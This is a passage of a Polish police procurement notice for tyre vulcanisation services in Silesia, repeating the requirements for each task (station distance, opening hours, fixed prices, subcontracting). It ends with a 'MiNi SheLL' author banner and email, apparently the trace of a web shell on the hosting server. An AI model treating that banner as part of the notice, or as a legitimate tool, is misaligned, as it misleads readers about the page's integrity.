b. 	Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce 	wyznaczenie trasy zostanie uruchomiona zakładka własny transport po czym w pozycji 1 zostanie wpisany 	adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej.
c.	Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP 	Chorzów, KPP Wodzisław Śląski, KMP Gliwice, KMP Dąbrowa Górnicza) będzie przekraczała 5 km 	liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 	pkt 2 ustawy Prawo Zamówień Publicznych.
7. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
8. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
9. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
10. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1,2,3 i nr 4 DO SIWZ. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
11. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
12. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
13. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
14. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KPP Wodzisław Śląski z siedzibą w Wodzisławiu Śląskim 44-313 przy ul. Kokoszycka 180 b..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nazwa nadana zamówieniu: ZP-2380-415-467-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego 
2. kod CPV:	50 11 65 00-6
3. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego. Jest to zamówienie udzielane w częściach a niniejsze zamówienie obejmuje trzy zadania:
4. 

Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KPP Wodzisław Śląski z siedzibą w Wodzisławiu Śląskim 44-313 przy ul. Kokoszycka 180 b.



5. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon, będących na stanie ww jednostek
a. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół z wyważaniem.
b. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 

Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski 29 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ

c. 	Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw 	wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw 	wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. 	Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
d. 	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do 	SIWZ - Umowa projekt
6. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.


Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KPP Wodzisław Śląski z siedzibą w Wodzisławiu Śląskim 44-313 przy ul. Kokoszycka 180 b.


a. 	Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, 			miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym 				umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
b. 	Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce 	wyznaczenie trasy zostanie uruchomiona zakładka własny transport po czym w pozycji 1 zostanie wpisany 	adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej.
c.	Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP 	Chorzów, KPP Wodzisław Śląski, KMP Gliwice, KMP Dąbrowa Górnicza) będzie przekraczała 5 km 	liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 	pkt 2 ustawy Prawo Zamówień Publicznych.
7. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
8. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
9. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
10. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1,2,3 i nr 4 DO SIWZ. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
11. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
12. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
13. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
14. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Gliwice z siedzibą w Gliwicach 44-100 przy ul. Powstańców Warszawskich 10-12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nazwa nadana zamówieniu: ZP-2380-415-467-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego 
2. kod CPV:	50 11 65 00-6
3. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego. Jest to zamówienie udzielane w częściach a niniejsze zamówienie obejmuje trzy zadania:
4. 

Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Gliwice z siedzibą w Gliwicach 44-100 przy ul. Powstańców Warszawskich 10-12.



5. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon, będących na stanie ww jednostek
a. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół z wyważaniem.
b. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 

Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Gliwice 72 szt pojazdów osobowych i 15 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ

c. 	Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw 	wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw 	wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. 	Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
d. 	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do 	SIWZ - Umowa projekt
6. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.


Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Gliwice z siedzibą w Gliwicach 44-100 przy ul. Powstańców Warszawskich 10-12.


a. 	Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, 			miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym 				umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
b. 	Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce 	wyznaczenie trasy zostanie uruchomiona zakładka własny transport po czym w pozycji 1 zostanie wpisany 	adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej.
c.	Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP 	Chorzów, KPP Wodzisław Śląski, KMP Gliwice, KMP Dąbrowa Górnicza) będzie przekraczała 5 km 	liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 	pkt 2 ustawy Prawo Zamówień Publicznych.
7. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
8. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
9. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
10. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1,2,3 i nr 4 DO SIWZ. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
11. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
12. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
13. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
14. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Dąbrowa Górnicza z siedzibą 44-100 Gliwice przy Al. Piłsudskiego 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nazwa nadana zamówieniu: ZP-2380-415-467-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego 
2. kod CPV:	50 11 65 00-6
3. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego. Jest to zamówienie udzielane w częściach a niniejsze zamówienie obejmuje trzy zadania:
4. 

Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Dąbrowa Górnicza z siedzibą 44-100 Gliwice przy Al. Piłsudskiego 11.

5. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon, będących na stanie ww jednostek
a. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół z wyważaniem.
b. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 

Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Dąbrowa Górniczą 28 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
c. 	Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw 	wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw 	wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. 	Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
d. 	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do 	SIWZ - Umowa projekt
6. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.


Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Dąbrowa Górnicza z siedzibą 44-100 Gliwice przy Al. Piłsudskiego 11.
a. 	Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, 			miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym 				umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
b. 	Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce 	wyznaczenie trasy zostanie uruchomiona zakładka własny transport po czym w pozycji 1 zostanie wpisany 	adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej.
c.	Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP 	Chorzów, KPP Wodzisław Śląski, KMP Gliwice, KMP Dąbrowa Górnicza) będzie przekraczała 5 km 	liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 	pkt 2 ustawy Prawo Zamówień Publicznych.
7. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
8. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
9. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
10. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1,2,3 i nr 4 DO SIWZ. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
11. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
12. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
13. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
14. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com